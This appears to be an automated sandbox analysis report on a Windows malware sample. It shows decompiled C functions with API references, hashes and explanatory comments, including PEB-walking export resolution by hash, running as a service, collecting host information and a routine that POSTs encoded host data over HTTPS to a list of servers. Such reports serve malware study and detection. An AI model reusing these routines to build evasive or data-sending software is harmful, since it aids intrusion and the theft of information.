                                                                                        0x00404bb6
                                                                                        0x00404bbd
                                                                                        0x00404bc0
                                                                                        0x00404bc6
                                                                                        0x00404bc9
                                                                                        0x00404bcf
                                                                                        0x00404bd2
                                                                                        0x00404bd8
                                                                                        0x00404bdd
                                                                                        0x00404be0
                                                                                        0x00404be3
                                                                                        0x00404be6
                                                                                        0x00404be9
                                                                                        0x00404bf2
                                                                                        0x00404bf9
                                                                                        0x00404bfc
                                                                                        0x00404c02
                                                                                        0x00404c05
                                                                                        0x00404c0b
                                                                                        0x00404c0e
                                                                                        0x00404c14
                                                                                        0x00404c19

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @
                                                                                        • API String ID: 0-2766056989
                                                                                        • Opcode ID: 18ad636fd247c377b08161490afa645b743f930d5ea7395dcc324908aaa8e533
                                                                                        • Instruction ID: 98e5c8fefd599ba26b3d4eaaa51e376bdd4639789aa86b62e4b501e9ffc4074c
                                                                                        • Opcode Fuzzy Hash: 18ad636fd247c377b08161490afa645b743f930d5ea7395dcc324908aaa8e533
                                                                                        • Instruction Fuzzy Hash: 90E13872D14F6A9BC764CF29C580591F3E0BF98220B06976ADC5CA3B01E775BDA18BC0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00402FB6(void* _a4, signed int* _a8) {
                                                                                        				void _v8;
                                                                                        				void* _t12;

                                                                                        				_t12 = 0;
                                                                                        				/* information class 0x1a is ProcessWow64Information: the query returns a
                                                                                        				   non-zero value when the target process _a4 runs under WOW64 */
                                                                                        				if(NtQueryInformationProcess(_a4, 0x1a,  &_v8, 4, 0) == 0) {
                                                                                        					 *_a8 = 0 | _v8 != 0x00000000;   /* *_a8 = 1 if WOW64, else 0 */
                                                                                        					_t12 = 1;                        /* success flag */
                                                                                        				}
                                                                                        				return _t12;
                                                                                        			}






                                                                                        APIs
                                                                                        • NtQueryInformationProcess.NTDLL(?,0000001A,00000000,00000004,00000000), ref: 00402FD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: InformationProcessQuery
                                                                                        • String ID:
                                                                                        • API String ID: 1778838933-0
                                                                                        • Opcode ID: d0c14a1113ac1fa2f6ae82ecee67b9fe3360c3d6be6988a0e40692ee0bd9bf95
                                                                                        • Instruction ID: 197e88fdda0d752d7a5c877a72fac8a44d184f2e754f7594785d1e43604a380d
                                                                                        • Opcode Fuzzy Hash: d0c14a1113ac1fa2f6ae82ecee67b9fe3360c3d6be6988a0e40692ee0bd9bf95
                                                                                        • Instruction Fuzzy Hash: 88E0E572305208BEE7109E659C45EBBB76CE741761F10423ABA04D21E0E6715E0492A4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00401B60() {
                                                                                        				void _v8;
                                                                                        				void* _t7;

                                                                                        				_t7 = 0;
                                                                                        				_v8 = _v8 & 0x00000000;   /* NULL token handle */
                                                                                        				/* 0xfffffffe is the NtCurrentThread pseudo-handle; information class 5 is
                                                                                        				   ThreadImpersonationToken, so setting a NULL token drops any impersonation
                                                                                        				   on the calling thread (the native equivalent of RevertToSelf) */
                                                                                        				if(NtSetInformationThread(0xfffffffe, 5,  &_v8, 4) == 0) {
                                                                                        					_t7 = 1;
                                                                                        				}
                                                                                        				return _t7;
                                                                                        			}






                                                                                        APIs
                                                                                        • NtSetInformationThread.NTDLL(000000FE,00000005,00000000,00000004), ref: 00401B7B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: InformationThread
                                                                                        • String ID:
                                                                                        • API String ID: 4046476035-0
                                                                                        • Opcode ID: 91af158a7b54514cc4fee008624f9b00fa99d19da9d83385013b2b4622dc768c
                                                                                        • Instruction ID: 06f78e9d7ce7a3ca4b9b31d5ca4f30c4bf89a7ff421c92d978add4f1999fd1f6
                                                                                        • Opcode Fuzzy Hash: 91af158a7b54514cc4fee008624f9b00fa99d19da9d83385013b2b4622dc768c
                                                                                        • Instruction Fuzzy Hash: A4E086B27092087EF710999A6C8AFB7B36CE781735F20437ABA24D11D0F6615E0881B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004054BB(void** _a4) {
                                                                                        				void* _v12;   /* IO_STATUS_BLOCK */

                                                                                        				/* _a4[0] is the file handle, _a4[1] the output buffer (0x10000 bytes);
                                                                                        				   information class 9 is FileNameInformation, so this retrieves the
                                                                                        				   file's name and returns the NTSTATUS of the call */
                                                                                        				return NtQueryInformationFile( *_a4,  &_v12, _a4[1], 0x10000, 9);
                                                                                        			}





                                                                                        APIs
                                                                                        • NtQueryInformationFile.NTDLL(?,?,?,00010000,00000009), ref: 004054D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: FileInformationQuery
                                                                                        • String ID:
                                                                                        • API String ID: 365787318-0
                                                                                        • Opcode ID: ce70c837223e219a87301e68f4524c228a14abbf4ddf43573a1731b69de89d49
                                                                                        • Instruction ID: d76f3af99f29cea25a8bce4ee3973846b9aecf6d6ebf6b866eef9585fa867104
                                                                                        • Opcode Fuzzy Hash: ce70c837223e219a87301e68f4524c228a14abbf4ddf43573a1731b69de89d49
                                                                                        • Instruction Fuzzy Hash: 4CD0A73510010C7BC7208A50CC05EA57B28D705314F104275BE145A1F0E6735561D7C9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00402A1F(struct _SERVICE_TABLE_ENTRY _a4) {

                                                                                        				/* fills the static SERVICE_TABLE_ENTRY at 0x40f95c: service name from the
                                                                                        				   argument, ServiceMain = E004027BC, then hands control to the SCM, i.e.
                                                                                        				   the sample runs its payload as a Windows service */
                                                                                        				 *0x40f95c = _a4;
                                                                                        				 *0x40f960 = E004027BC;
                                                                                        				return StartServiceCtrlDispatcherW(0x40f95c);
                                                                                        			}




                                                                                        APIs
                                                                                        • StartServiceCtrlDispatcherW.ADVAPI32(0040F95C,?,00409287,.2c9ccbf3,.2c9ccbf3), ref: 00402A3A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CtrlDispatcherServiceStart
                                                                                        • String ID:
                                                                                        • API String ID: 3789849863-0
                                                                                        • Opcode ID: f9c489ca971324dc97495b56aa2b73a5cf452d7b72d33e38d02a823237883c95
                                                                                        • Instruction ID: 8fcf9c9fc0ed8821340c37450363af474460318d29d11ca68bed58065611c5a6
                                                                                        • Opcode Fuzzy Hash: f9c489ca971324dc97495b56aa2b73a5cf452d7b72d33e38d02a823237883c95
                                                                                        • Instruction Fuzzy Hash: 94D012B5000308AFC311EF64EA44A917BE8E304B00300C137EC00E3A60D7707408CF5C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004016D2() {
                                                                                        				intOrPtr _t3;
                                                                                        				intOrPtr _t14;
                                                                                        				intOrPtr _t15;
                                                                                        
                                                                                        				/* fs:[0x30] is the PEB on 32-bit Windows; the version fields are read
                                                                                        				   directly from it instead of calling GetVersion(Ex) */
                                                                                        				_t3 =  *[fs:0x30];
                                                                                        				_t15 =  *((intOrPtr*)(_t3 + 0xa4));   /* PEB->OSMajorVersion */
                                                                                        				_t14 =  *((intOrPtr*)(_t3 + 0xa8));   /* PEB->OSMinorVersion */
                                                                                        				if(_t15 != 5 || _t14 >= 1) {
                                                                                        					if(_t15 >= 5) {
                                                                                        						if(_t15 != 5 || _t14 != 1) {
                                                                                        							if(_t15 != 5 || _t14 != 2) {
                                                                                        								if(_t15 != 6 || _t14 != 0) {
                                                                                        									if(_t15 != 6 || _t14 != 1) {
                                                                                        										if(_t15 != 6 || _t14 != 2) {
                                                                                        											if(_t15 != 6 || _t14 != 3) {
                                                                                        												if(_t15 != 0xa || _t14 != 0) {
                                                                                        													if(_t15 != 0xa || _t14 <= 0) {
                                                                                        														if(_t15 <= 0xa) {
                                                                                        															return 0xffffffff;
                                                                                        														} else {
                                                                                        															goto L28;
                                                                                        														}
                                                                                        													} else {
                                                                                        														L28:
                                                                                        														return 0x7fffffff;
                                                                                        													}
                                                                                        												} else {
                                                                                        													return 0x64;
                                                                                        												}
                                                                                        											} else {
                                                                                        												return 0x3f;
                                                                                        											}
                                                                                        										} else {
                                                                                        											return 0x3e;
                                                                                        										}
                                                                                        									} else {
                                                                                        										return 0x3d;
                                                                                        									}
                                                                                        								} else {
                                                                                        									return 0x3c;
                                                                                        								}
                                                                                        							} else {
                                                                                        								return 0x34;
                                                                                        							}
                                                                                        						} else {
                                                                                        							return 0x33;
                                                                                        						}
                                                                                        					} else {
                                                                                        						goto L3;
                                                                                        					}
                                                                                        				} else {
                                                                                        					L3:
                                                                                        					return 0;
                                                                                        				}
                                                                                        			}







                                                                                        Memory Dump Source
                                                                                         • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c7e72c307177f6a1db432bd4753912065af70b35d513cc741f195f205da1b5c
                                                                                        • Instruction ID: 62198b74f6ec90cd68ae938ca120177b071c0c5c86d7114dca3690ffeb8fd3c9
                                                                                        • Opcode Fuzzy Hash: 7c7e72c307177f6a1db432bd4753912065af70b35d513cc741f195f205da1b5c
                                                                                        • Instruction Fuzzy Hash: 8511F53BF0412006DE75200DF1903EF525A83EA3B1F070577EA69BB3E4A13C5CCA8199
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 93%
                                                                                         			E004017AE(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                         				/* Resolves an export by walking the PEB loader list: _a4 is the hash of the wanted
                                                                                         				   module's base name, _a8 the hash of the wanted export name (hash routine E00401000). */
                                                                                         				intOrPtr _v8;
                                                                                         				intOrPtr _v12;
                                                                                         				intOrPtr _t25;
                                                                                         				intOrPtr _t30;
                                                                                         				void* _t31;
                                                                                         				void* _t33;
                                                                                         				intOrPtr _t34;
                                                                                         				void* _t37;
                                                                                         				intOrPtr _t38;
                                                                                         				void* _t39;
                                                                                         				intOrPtr* _t40;
                                                                                         				void* _t42;
                                                                                         				intOrPtr* _t43;
                                                                                         
                                                                                         				_v8 = 0;
                                                                                         				/* PEB->Ldr (+0xc), then InLoadOrderModuleList (+0xc); _t33 is the list head */
                                                                                         				_t25 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                                                         				_t33 = _t25 + 0xc;
                                                                                         				_t43 =  *((intOrPtr*)(_t25 + 0xc));
                                                                                         				while(1) {
                                                                                         					/* LDR_DATA_TABLE_ENTRY+0x2c is BaseDllName (Length at +0x2c, Buffer at +0x30) */
                                                                                         					_t40 = _t43 + 0x2c;
                                                                                         					E004011D1(_t25,  *((intOrPtr*)(_t43 + 0x30)));
                                                                                         					/* hash of the module name compared against the requested module hash */
                                                                                         					if(E00401000( *((intOrPtr*)(_t43 + 0x30)),  *_t40 & 0x0000ffff, 0xffffffff) == _a4) {
                                                                                         						break;
                                                                                         					}
                                                                                         					_t43 =  *_t43;   /* InLoadOrderLinks.Flink: next module */
                                                                                         					if(_t33 != _t43) {
                                                                                         						continue;
                                                                                         					}
                                                                                         					L13:
                                                                                         					return _v8;   /* 0 when the module or export is not found */
                                                                                         				}
                                                                                         				/* DllBase (+0x18); export directory RVA at e_lfanew + 0x78 */
                                                                                         				_t34 =  *((intOrPtr*)(_t43 + 0x18));
                                                                                         				_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x3c)) + _t34 + 0x78));
                                                                                         				if(_t38 != 0) {
                                                                                         					_t39 = _t38 + _t34;
                                                                                         					_t30 =  *((intOrPtr*)(_t39 + 0x18));   /* NumberOfNames */
                                                                                         					_v12 = _t30;
                                                                                         					_t42 =  *((intOrPtr*)(_t39 + 0x24)) + _t34;   /* AddressOfNameOrdinals */
                                                                                         					do {
                                                                                         						asm("lodsd");   /* esi-based reads were not recovered by the decompiler */
                                                                                         						_t31 = 0;
                                                                                         						_t37 = _t30 + _t34;
                                                                                         						while( *((char*)(_t37 + _t31)) != 0) {   /* length of the export name */
                                                                                         							_t31 = _t31 + 1;
                                                                                         						}
                                                                                         						_t30 = E00401000(_t37, _t31, 0xffffffff);
                                                                                         						if(_t30 != _a8) {
                                                                                         							goto L10;
                                                                                         						} else {
                                                                                         							asm("lodsd");
                                                                                         							_v8 = _t30 + _t34;   /* matching export: RVA + DllBase */
                                                                                         						}
                                                                                         						break;
                                                                                         						L10:
                                                                                         						_t42 = _t42 + 2;   /* name ordinals are WORDs */
                                                                                         						_v12 = _v12 - 1;
                                                                                         					} while (_v12 != 0);
                                                                                         				}
                                                                                         				goto L13;
                                                                                         			}















                                                                                        Memory Dump Source
                                                                                         • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 76da5388272f0654a036035e2ae43d9bacd86774028a8486ef1af727eb1b6df4
                                                                                        • Instruction ID: 7d75c00d8e0aabca25eade6b4d333c433445153db727a473c40db91fda26082c
                                                                                        • Opcode Fuzzy Hash: 76da5388272f0654a036035e2ae43d9bacd86774028a8486ef1af727eb1b6df4
                                                                                        • Instruction Fuzzy Hash: 5D21C173E00115DFCB10DF05C880A6AB3F5FB54324F25827AE819B73A1D739AE85CAA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                         			E0040A288() {
                                                                                         				intOrPtr _t9;
                                                                                         				intOrPtr _t10;
                                                                                         
                                                                                         				/* copies process facts from the x86 PEB into globals */
                                                                                         				_t10 =  *[fs:0x30];
                                                                                         				 *0x40f5d6 =  *((intOrPtr*)(_t10 + 0x18));   /* ProcessHeap */
                                                                                         				 *0x40f5da =  *((intOrPtr*)(_t10 + 8));      /* ImageBaseAddress */
                                                                                         				 *0x40f5de =  *((intOrPtr*)(_t10 + 0x64));   /* NumberOfProcessors */
                                                                                         				/* ProcessParameters (+0x10) -> CommandLine.Buffer (+0x44) */
                                                                                         				_t9 =  *((intOrPtr*)( *((intOrPtr*)(_t10 + 0x10)) + 0x44));
                                                                                         				 *0x40f5e2 = _t9;
                                                                                         				return _t9;
                                                                                         			}






                                                                                        Memory Dump Source
                                                                                         • Source File: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b21beb61abe3ae5801963b42da0289d90e85e0eb80719bcbfbfbdb54e159fae2
                                                                                        • Instruction ID: cba434550d4dbedab9be969996abf8f637f6bb048d72f448dedacbbc1a88f4bd
                                                                                        • Opcode Fuzzy Hash: b21beb61abe3ae5801963b42da0289d90e85e0eb80719bcbfbfbdb54e159fae2
                                                                                        • Instruction Fuzzy Hash: 7DE026B5605200DFC768DF18DA5090177F4F748214720047DD409DBB52D736D806CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
E004085B7(intOrPtr _a4, intOrPtr _a8) {
	void* _v8;
	void* _v12;
	void* _v16;
	void* _v20;
	WCHAR* _v24;
	void* _v28;
	void* _v32;
	long _v36;
	long _v40;
	short _v50;
	char _v66;
	short _v98;
	void* _t93;
	int _t94;
	long _t98;
	intOrPtr* _t104;
	char _t111;
	char _t113;
	long _t114;
	char _t115;
	char _t118;
	signed int _t124;
	long _t126;
	void* _t127;
	void* _t128;
	char* _t129;
	wchar_t* _t130;
	void* _t131;
	void* _t132;
	void* _t133;

	_v32 = 0;
	_v28 = 0;
	_v20 = 0;
	_v8 = 0;
	_v12 = 0;
	_v16 = 0;
	if(_a4 != 0) {
		_t124 = E00405248(0x40f580, 0x10, _a4, _a8);
		__eflags = _t124;
		if(_t124 != 0) {
			_v32 = RtlAllocateHeap( *0x40f5d6, 8, _t124 * 4);
			__eflags = _v32;
			if(_v32 != 0) {
				_t93 = E0040132C(_a4, _t124, _v32);
				_t94 = strlen("0601ac206b9e361");
				_t132 = _t131 + 4;
				_t16 = _t94 + 0x16; // 0x16
				_v28 = RtlAllocateHeap( *0x40f5d6, 8, _t93 + _t16);
				__eflags = _v28;
				if(_v28 != 0) {
					_t129 =  &_v98;
					 *_t129 = 0x78382e25;
					_t129[4] = 0x2673253d;
					_t129[8] = 0x78382e25;
					_t129[0xc] = 0x73253d;
					_t98 = sprintf(_v28, _t129, E004049F9(), _v32, _t127, "0601ac206b9e361");
					_t133 = _t132 + 0x18;
					_t126 = _t98;
					_v24 = E00401D08(0x40f057);
					__eflags = _v24;
					if(_v24 != 0) {
						_v8 = InternetOpenW(_v24, 0, 0, 0, 0);
						__eflags = _v8;
						if(_v8 != 0) {
							_t130 =  *0x40f5c6; // 0x0
							__eflags = _t130;
							if(_t130 != 0) {
								while(1) {
									_v12 = InternetConnectW(_v8, _t130, 0x1bb, 0, 0, 3, 0, 0);
									__eflags = _v12;
									if(__eflags != 0) {
										goto L20;
									}
									L15:
									_t118 = wcslen(_t130);
									_t133 = _t133 + 4;
									__eflags = _t118;
									if(_t118 != 0) {
										_t130 = _t130 + 2 + _t118 * 2;
										__eflags =  *_t130;
										if( *_t130 != 0) {
											continue;
										} else {
										}
									} else {
									}
									goto L36;
									L20:
									E00408933(__eflags,  &_v98);
									_t104 =  &_v50;
									 *_t104 = 0x4f0050;
									 *((intOrPtr*)(_t104 + 4)) = 0x540053;
									 *((short*)(_t104 + 8)) = 0;
									_v16 = HttpOpenRequestW(_v12,  &_v50,  &_v98, 0, 0, 0, 0x800000, 0);
									__eflags = _v16;
									if(_v16 != 0) {
										_v20 = E00401D08(0x40f0f7);
										__eflags = _v20;
										if(_v20 != 0) {
											_v36 = 0;
											_v40 = 4;
											_t111 = InternetQueryOptionW(_v16, 0x1f,  &_v36,  &_v40);
											__eflags = _t111;
											if(_t111 != 0) {
												_v36 = _v36 | 0x84603300;
												_t113 = InternetSetOptionW(_v16, 0x1f,  &_v36, 4);
												__eflags = _t113;
												if(_t113 != 0) {
													_t114 = wcslen(_v20);
													_t133 = _t133 + 4;
													_t115 = HttpSendRequestW(_v16, _v20, _t114, _v28, _t126);
													__eflags = _t115;
													if(_t115 != 0) {
														_v40 = 0x10;
														_v36 = 0;
														_t128 =  &_v66;
														_t118 = HttpQueryInfoW(_v16, 0x13, _t128,  &_v40,  &_v36);
														__eflags = _t118;
														if(_t118 == 0) {
															L35:
															RtlFreeHeap( *0x40f5d6, 0, _v20);
															_v20 = 0;
															InternetCloseHandle(_v16);
															_v16 = 0;
															InternetCloseHandle(_v12);
															_v12 = 0;
															goto L15;
														} else {
															__eflags =  *_t128 - 0x35;
															if( *_t128 != 0x35) {
																goto L35;
															} else {
																__eflags =  *((short*)(_t128 + 2)) - 0x30;
																if( *((short*)(_t128 + 2)) != 0x30) {
																	goto L35;
																} else {
																	__eflags =  *((short*)(_t128 + 4)) - 0x30;
																	if( *((short*)(_t128 + 4)) != 0x30) {
																		goto L35;
																	} else {
																	}
																}
															}
														}
													} else {
													}
												} else {
												}
											} else {
											}
										} else {
										}
									} else {
										InternetCloseHandle(_v12);
										_v12 = 0;
										goto L15;
									}
									goto L36;
								}
							} else {
							}
						} else {
						}
					} else {
					}
				} else {
				}
			} else {
			}
		} else {
		}
	} else {
	}
	L36:
	if(_v16 != 0) {
		_t118 = InternetCloseHandle(_v16);
	}
	if(_v12 != 0) {
		_t118 = InternetCloseHandle(_v12);
	}
	if(_v8 != 0) {
		_t118 = InternetCloseHandle(_v8);
	}
	if(_v20 != 0) {
		_t118 = RtlFreeHeap( *0x40f5d6, 0, _v20);
	}
	if(_v24 != 0) {
		_t118 = RtlFreeHeap( *0x40f5d6, 0, _v24);
	}
	if(_v28 != 0) {
		_t118 = RtlFreeHeap( *0x40f5d6, 0, _v28);
	}
	if(_v32 != 0) {
		return RtlFreeHeap( *0x40f5d6, 0, _v32);
	}
	return _t118;
}
0x004085c2
0x004085c9
0x004085d0
0x004085d7
0x004085de
0x004085e5
0x004085f0
0x00408609
0x0040860b
0x0040860d
0x0040862a
0x0040862d
0x00408631
0x0040863f
0x0040864b
0x00408651
0x00408654
0x00408667
0x0040866a
0x0040866e
0x00408675
0x00408678
0x0040867e
0x00408685
0x0040868c
0x004086a6
0x004086ac
0x004086af
0x004086bb
0x004086be
0x004086c2
0x004086da
0x004086dd
0x004086e1
0x004086e8
0x004086ee
0x004086f0
0x004086f7
0x00408710
0x00408713
0x00408717
0x00000000
0x00000000
0x00408719
0x0040871a
0x00408720
0x00408723
0x00408725
0x0040872c
0x00408730
0x00408734
0x00000000
0x00000000
0x00408736
0x00000000
0x00408727
0x00000000
0x0040873d
0x00408741
0x00408746
0x00408749
0x0040874f
0x00408756
0x0040877a
0x0040877d
0x00408781
0x0040879f
0x004087a2
0x004087a6
0x004087ad
0x004087b4
0x004087c8
0x004087ce
0x004087d0
0x004087d7
0x004087e9
0x004087ef
0x004087f1
0x004087fb
0x00408801
0x0040880f
0x00408815
0x00408817
0x0040881e
0x00408825
0x0040882c
0x0040883d
0x00408843
0x00408845
0x0040885d
0x00408868
0x0040886e
0x00408878
0x0040887e
0x00408888
0x0040888e
0x00000000
0x00408847
0x00408847
0x0040884b
0x00000000
0x0040884d
0x0040884d
0x00408852
0x00000000
0x00408854
0x00408854
0x00408859
0x00000000
0x00000000
0x0040885b
0x00408859
0x00408852
0x0040884b
0x00000000
0x00408819
0x00000000
0x004087f3
0x00000000
0x004087d2
0x00000000
0x004087a8
                                                                                        0x00408783
                                                                                        0x00408786
                                                                                        0x0040878c
                                                                                        0x00000000
                                                                                        0x0040878c
                                                                                        0x00000000
                                                                                        0x00408781
                                                                                        0x00000000
                                                                                        0x004086f2
                                                                                        0x00000000
                                                                                        0x004086e3
                                                                                        0x00000000
                                                                                        0x004086c4
                                                                                        0x00000000
                                                                                        0x00408670
                                                                                        0x00000000
                                                                                        0x00408633
                                                                                        0x00000000
                                                                                        0x0040860f
                                                                                        0x00000000
                                                                                        0x004085f2
                                                                                        0x0040889f
                                                                                        0x004088a3
                                                                                        0x004088a8
                                                                                        0x004088a8
                                                                                        0x004088b2
                                                                                        0x004088b7
                                                                                        0x004088b7
                                                                                        0x004088c1
                                                                                        0x004088c6
                                                                                        0x004088c6
                                                                                        0x004088d0
                                                                                        0x004088dd
                                                                                        0x004088dd
                                                                                        0x004088e7
                                                                                        0x004088f4
                                                                                        0x004088f4
                                                                                        0x004088fe
                                                                                        0x0040890b
                                                                                        0x0040890b
                                                                                        0x00408915
                                                                                        0x00000000
                                                                                        0x00408922
                                                                                        0x00408930

                                                                                        APIs
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004088A8
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004088B7
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004088C6
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004088DD
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004088F4
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040890B
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00408922
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: FreeHeap$CloseHandleInternet
                                                                                        • String ID: %.8x$0601ac206b9e361$=%s$=%s&
                                                                                        • API String ID: 2108494971-3183917044
                                                                                        • Opcode ID: 1e91032d1b68d20008cbc787e3a3d2a4868eb0f7d74a4c4202e71baad88772e7
                                                                                        • Instruction ID: 019262c529223721c194e008e8c284c4cb16651cc733332db51cdf77f4131d10
                                                                                        • Opcode Fuzzy Hash: 1e91032d1b68d20008cbc787e3a3d2a4868eb0f7d74a4c4202e71baad88772e7
                                                                                        • Instruction Fuzzy Hash: 50A16071900208EFDF21AF90DE09BAE7BB4FB04304F60803AE641B65E1DB795A59DB59
                                                                                        Uniqueness
                                                                                        • Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 95%
                                                                                        			// Decompiler output for the function at 004083CA. The comments follow the API references the
                                                                                        			// report lists for this function and its subcalls: it gathers host information into a single
                                                                                        			// heap-allocated wide string and returns it (0 if the buffer could not be allocated).
                                                                                        			E004083CA() {
                                                                                        				wchar_t* _v8;
                                                                                        				wchar_t* _v12;
                                                                                        				wchar_t* _v16;
                                                                                        				wchar_t* _v20;
                                                                                        				wchar_t* _v24;
                                                                                        				wchar_t* _v28;
                                                                                        				wchar_t* _v32;
                                                                                        				wchar_t* _v36;
                                                                                        				wchar_t* _v40;
                                                                                        				void* _v44;
                                                                                        				int _t58;
                                                                                        				int _t59;
                                                                                        				int _t60;
                                                                                        				int _t61;
                                                                                        				int _t62;
                                                                                        				int _t63;
                                                                                        				int _t64;
                                                                                        				int _t65;
